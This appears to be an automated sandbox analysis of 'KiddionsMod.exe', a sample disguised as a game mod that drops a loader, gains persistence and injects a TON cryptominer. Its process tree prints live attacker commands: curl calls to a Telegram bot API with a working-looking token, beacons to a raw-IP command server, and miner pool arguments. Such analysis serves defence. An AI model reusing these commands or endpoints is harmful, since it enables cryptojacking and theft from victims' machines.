Analysis
-
max time kernel
156s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
19-01-2022 21:45
Static task
static1
Behavioral task
behavioral1
Sample
KiddionsMod.exe
Resource
win7-en-20211208
General
-
Target
KiddionsMod.exe
-
Size
1.3MB
-
MD5
19cfd5a417830805d328cc9e09dc14c1
-
SHA1
836b391c349ae25da63c33438aa6a8f4b1e10748
-
SHA256
cb69d24dbd59161cdbc6483fe59b0fc5cec108973d5a20a0636370e7c27ab201
-
SHA512
1b2cf065b606d65e2253fda80c15848d80d3a1e0b5ab11f3cb3b73864704ca90a8d99d6e92ca45b95269dc04612822883ea87eb31da5fcd5fd992a02ab36546b
Malware Config
Signatures
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 13 IoCs
Processes:
loader.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeasf3r3.exee3dwefw.exeRegHost.exeRegHost.exeRegHost.exeoobeldr.exeRegHost.exeRegHost.exepid process 2756 loader.exe 3908 RegHost.exe 1544 RegHost.exe 1720 RegHost.exe 2856 RegHost.exe 3100 asf3r3.exe 2412 e3dwefw.exe 2928 RegHost.exe 2368 RegHost.exe 3060 RegHost.exe 3900 oobeldr.exe 2580 RegHost.exe 1284 RegHost.exe -
Sets service image path in registry 2 TTPs
-
Processes:
resource yara_rule behavioral2/memory/2772-168-0x0000000140000000-0x000000014274C000-memory.dmp upx -
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
RegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeloader.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion loader.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion loader.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
RegAsm.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation RegAsm.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\loader.exe themida C:\Users\Admin\AppData\Local\Temp\loader.exe themida behavioral2/memory/2756-165-0x00007FF7575B0000-0x00007FF757E98000-memory.dmp themida behavioral2/memory/2756-166-0x00007FF7575B0000-0x00007FF757E98000-memory.dmp themida behavioral2/memory/2756-167-0x00007FF7575B0000-0x00007FF757E98000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida behavioral2/memory/3908-184-0x00007FF641840000-0x00007FF642128000-memory.dmp themida behavioral2/memory/3908-185-0x00007FF641840000-0x00007FF642128000-memory.dmp themida behavioral2/memory/3908-186-0x00007FF641840000-0x00007FF642128000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida behavioral2/memory/1544-202-0x00007FF641840000-0x00007FF642128000-memory.dmp themida behavioral2/memory/1544-203-0x00007FF641840000-0x00007FF642128000-memory.dmp themida behavioral2/memory/1544-204-0x00007FF641840000-0x00007FF642128000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida behavioral2/memory/1720-220-0x00007FF641840000-0x00007FF642128000-memory.dmp themida behavioral2/memory/1720-221-0x00007FF641840000-0x00007FF642128000-memory.dmp themida behavioral2/memory/1720-222-0x00007FF641840000-0x00007FF642128000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida behavioral2/memory/2856-243-0x00007FF641840000-0x00007FF642128000-memory.dmp themida behavioral2/memory/2856-244-0x00007FF641840000-0x00007FF642128000-memory.dmp themida behavioral2/memory/2856-246-0x00007FF641840000-0x00007FF642128000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida behavioral2/memory/2928-251-0x00007FF641840000-0x00007FF642128000-memory.dmp themida behavioral2/memory/2928-252-0x00007FF641840000-0x00007FF642128000-memory.dmp themida behavioral2/memory/2928-253-0x00007FF641840000-0x00007FF642128000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida behavioral2/memory/2368-269-0x00007FF641840000-0x00007FF642128000-memory.dmp themida behavioral2/memory/2368-270-0x00007FF641840000-0x00007FF642128000-memory.dmp themida behavioral2/memory/2368-271-0x00007FF641840000-0x00007FF642128000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida behavioral2/memory/3060-287-0x00007FF641840000-0x00007FF642128000-memory.dmp themida behavioral2/memory/3060-288-0x00007FF641840000-0x00007FF642128000-memory.dmp themida behavioral2/memory/3060-289-0x00007FF641840000-0x00007FF642128000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida behavioral2/memory/2580-296-0x00007FF641840000-0x00007FF642128000-memory.dmp themida behavioral2/memory/2580-297-0x00007FF641840000-0x00007FF642128000-memory.dmp themida behavioral2/memory/2580-298-0x00007FF641840000-0x00007FF642128000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida behavioral2/memory/1284-314-0x00007FF641840000-0x00007FF642128000-memory.dmp themida behavioral2/memory/1284-315-0x00007FF641840000-0x00007FF642128000-memory.dmp themida behavioral2/memory/1284-316-0x00007FF641840000-0x00007FF642128000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 10 IoCs
Processes:
RegHost.exeRegHost.exeRegHost.exeRegHost.exeloader.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" loader.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
loader.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA loader.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe -
Suspicious use of SetThreadContext 21 IoCs
Processes:
KiddionsMod.exeloader.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exedescription pid process target process PID 2828 set thread context of 3084 2828 KiddionsMod.exe RegAsm.exe PID 2756 set thread context of 2772 2756 loader.exe bfsvc.exe PID 2756 set thread context of 1484 2756 loader.exe explorer.exe PID 3908 set thread context of 2828 3908 RegHost.exe bfsvc.exe PID 3908 set thread context of 556 3908 RegHost.exe explorer.exe PID 1544 set thread context of 756 1544 RegHost.exe bfsvc.exe PID 1544 set thread context of 1420 1544 RegHost.exe explorer.exe PID 1720 set thread context of 1956 1720 RegHost.exe bfsvc.exe PID 1720 set thread context of 224 1720 RegHost.exe explorer.exe PID 2856 set thread context of 3392 2856 RegHost.exe bfsvc.exe PID 2856 set thread context of 3024 2856 RegHost.exe explorer.exe PID 2928 set thread context of 1944 2928 RegHost.exe bfsvc.exe PID 2928 set thread context of 3300 2928 RegHost.exe explorer.exe PID 2368 set thread context of 220 2368 RegHost.exe bfsvc.exe PID 2368 set thread context of 2016 2368 RegHost.exe explorer.exe PID 3060 set thread context of 3580 3060 RegHost.exe bfsvc.exe PID 3060 set thread context of 1340 3060 RegHost.exe explorer.exe PID 2580 set thread context of 2376 2580 RegHost.exe bfsvc.exe PID 2580 set thread context of 904 2580 RegHost.exe explorer.exe PID 1284 set thread context of 2732 1284 RegHost.exe bfsvc.exe PID 1284 set thread context of 3964 1284 RegHost.exe explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 41 IoCs
Processes:
WaaSMedicAgent.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
RegAsm.exeexplorer.exeexplorer.exeexplorer.exepid process 3084 RegAsm.exe 3084 RegAsm.exe 3084 RegAsm.exe 1484 explorer.exe 1484 explorer.exe 1484 explorer.exe 1484 explorer.exe 1484 explorer.exe 1484 explorer.exe 1484 explorer.exe 1484 explorer.exe 1484 explorer.exe 1484 explorer.exe 1484 explorer.exe 1484 explorer.exe 1484 explorer.exe 1484 explorer.exe 1484 explorer.exe 1484 explorer.exe 1484 explorer.exe 1484 explorer.exe 1484 explorer.exe 1484 explorer.exe 1484 explorer.exe 1484 explorer.exe 1484 explorer.exe 1484 explorer.exe 1484 explorer.exe 1484 explorer.exe 1484 explorer.exe 1484 explorer.exe 1484 explorer.exe 1484 explorer.exe 556 explorer.exe 556 explorer.exe 556 explorer.exe 556 explorer.exe 556 explorer.exe 556 explorer.exe 556 explorer.exe 556 explorer.exe 556 explorer.exe 556 explorer.exe 556 explorer.exe 556 explorer.exe 556 explorer.exe 556 explorer.exe 556 explorer.exe 556 explorer.exe 556 explorer.exe 556 explorer.exe 556 explorer.exe 556 explorer.exe 556 explorer.exe 556 explorer.exe 556 explorer.exe 556 explorer.exe 556 explorer.exe 556 explorer.exe 556 explorer.exe 556 explorer.exe 556 explorer.exe 556 explorer.exe 1420 explorer.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
RegAsm.exesvchost.exesvchost.exeasf3r3.exedescription pid process Token: SeDebugPrivilege 3084 RegAsm.exe Token: SeSystemtimePrivilege 1836 svchost.exe Token: SeSystemtimePrivilege 1836 svchost.exe Token: SeIncBasePriorityPrivilege 1836 svchost.exe Token: SeSystemtimePrivilege 1836 svchost.exe Token: SeSystemtimePrivilege 1160 svchost.exe Token: SeSystemtimePrivilege 1160 svchost.exe Token: SeIncBasePriorityPrivilege 1160 svchost.exe Token: SeDebugPrivilege 3100 asf3r3.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
KiddionsMod.exeRegAsm.exeloader.exeexplorer.exeRegHost.exedescription pid process target process PID 2828 wrote to memory of 3084 2828 KiddionsMod.exe RegAsm.exe PID 2828 wrote to memory of 3084 2828 KiddionsMod.exe RegAsm.exe PID 2828 wrote to memory of 3084 2828 KiddionsMod.exe RegAsm.exe PID 2828 wrote to memory of 3084 2828 KiddionsMod.exe RegAsm.exe PID 2828 wrote to memory of 3084 2828 KiddionsMod.exe RegAsm.exe PID 2828 wrote to memory of 3084 2828 KiddionsMod.exe RegAsm.exe PID 2828 wrote to memory of 3084 2828 KiddionsMod.exe RegAsm.exe PID 2828 wrote to memory of 3084 2828 KiddionsMod.exe RegAsm.exe PID 3084 wrote to memory of 2756 3084 RegAsm.exe loader.exe PID 3084 wrote to memory of 2756 3084 RegAsm.exe loader.exe PID 2756 wrote to memory of 4020 2756 loader.exe curl.exe PID 2756 wrote to memory of 4020 2756 loader.exe curl.exe PID 2756 wrote to memory of 2772 2756 loader.exe bfsvc.exe PID 2756 wrote to memory of 2772 2756 loader.exe bfsvc.exe PID 2756 wrote to memory of 2772 2756 loader.exe bfsvc.exe PID 2756 wrote to memory of 2772 2756 loader.exe bfsvc.exe PID 2756 wrote to memory of 2772 2756 loader.exe bfsvc.exe PID 2756 wrote to memory of 2772 2756 loader.exe bfsvc.exe PID 2756 wrote to memory of 2772 2756 loader.exe bfsvc.exe PID 2756 wrote to memory of 2772 2756 loader.exe bfsvc.exe PID 2756 wrote to memory of 2772 2756 loader.exe bfsvc.exe PID 2756 wrote to memory of 1484 2756 loader.exe explorer.exe PID 2756 wrote to memory of 1484 2756 loader.exe explorer.exe PID 2756 wrote to memory of 1484 2756 loader.exe explorer.exe PID 2756 wrote to memory of 1484 2756 loader.exe explorer.exe PID 2756 wrote to memory of 1484 2756 loader.exe explorer.exe PID 2756 wrote to memory of 1484 2756 loader.exe explorer.exe PID 2756 wrote to memory of 1484 2756 loader.exe explorer.exe PID 2756 wrote to memory of 1484 2756 loader.exe explorer.exe PID 2756 wrote to memory of 1484 2756 loader.exe explorer.exe PID 2756 wrote to memory of 1484 2756 loader.exe explorer.exe PID 2756 wrote to memory of 1484 2756 loader.exe explorer.exe PID 2756 wrote to memory of 1484 2756 loader.exe explorer.exe PID 2756 wrote to memory of 1484 2756 loader.exe explorer.exe PID 2756 wrote to memory of 1484 2756 loader.exe explorer.exe PID 2756 wrote to memory of 1484 2756 loader.exe explorer.exe PID 2756 wrote to memory of 1484 2756 loader.exe explorer.exe PID 2756 wrote to memory of 1484 2756 loader.exe explorer.exe PID 1484 wrote to memory of 2016 1484 explorer.exe curl.exe PID 1484 wrote to memory of 2016 1484 explorer.exe curl.exe PID 1484 wrote to memory of 3908 1484 explorer.exe RegHost.exe PID 1484 wrote to memory of 3908 1484 explorer.exe RegHost.exe PID 3908 wrote to memory of 2828 3908 RegHost.exe bfsvc.exe PID 3908 wrote to memory of 2828 3908 RegHost.exe bfsvc.exe PID 3908 wrote to memory of 2828 3908 RegHost.exe bfsvc.exe PID 3908 wrote to memory of 2828 3908 RegHost.exe bfsvc.exe PID 3908 wrote to memory of 2828 3908 RegHost.exe bfsvc.exe PID 3908 wrote to memory of 2828 3908 RegHost.exe bfsvc.exe PID 3908 wrote to memory of 2828 3908 RegHost.exe bfsvc.exe PID 3908 wrote to memory of 2828 3908 RegHost.exe bfsvc.exe PID 3908 wrote to memory of 2828 3908 RegHost.exe bfsvc.exe PID 3908 wrote to memory of 556 3908 RegHost.exe explorer.exe PID 3908 wrote to memory of 556 3908 RegHost.exe explorer.exe PID 3908 wrote to memory of 556 3908 RegHost.exe explorer.exe PID 3908 wrote to memory of 556 3908 RegHost.exe explorer.exe PID 3908 wrote to memory of 556 3908 RegHost.exe explorer.exe PID 3908 wrote to memory of 556 3908 RegHost.exe explorer.exe PID 3908 wrote to memory of 556 3908 RegHost.exe explorer.exe PID 3908 wrote to memory of 556 3908 RegHost.exe explorer.exe PID 3908 wrote to memory of 556 3908 RegHost.exe explorer.exe PID 3908 wrote to memory of 556 3908 RegHost.exe explorer.exe PID 3908 wrote to memory of 556 3908 RegHost.exe explorer.exe PID 3908 wrote to memory of 556 3908 RegHost.exe explorer.exe PID 3908 wrote to memory of 556 3908 RegHost.exe explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\KiddionsMod.exe"C:\Users\Admin\AppData\Local\Temp\KiddionsMod.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd2⤵
- Checks computer location settings
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\curl.execurl "https://api.telegram.org/bot5080602212:AAFzGPp7yFVoPgAstCfae6JTAOpzgmOhueI/sendMessage?chat_id=-1001744615146&text=%F0%9F%99%88 New worker!%0AGPU: Microsoft Basic Display Adapter%0AWorker Tag: Krutoi"4⤵
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX4⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\curl.execurl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"5⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX6⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"6⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SYSTEM32\curl.execurl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"7⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX8⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"8⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SYSTEM32\curl.execurl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"9⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"9⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX10⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"10⤵
-
C:\Windows\SYSTEM32\curl.execurl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"11⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"11⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
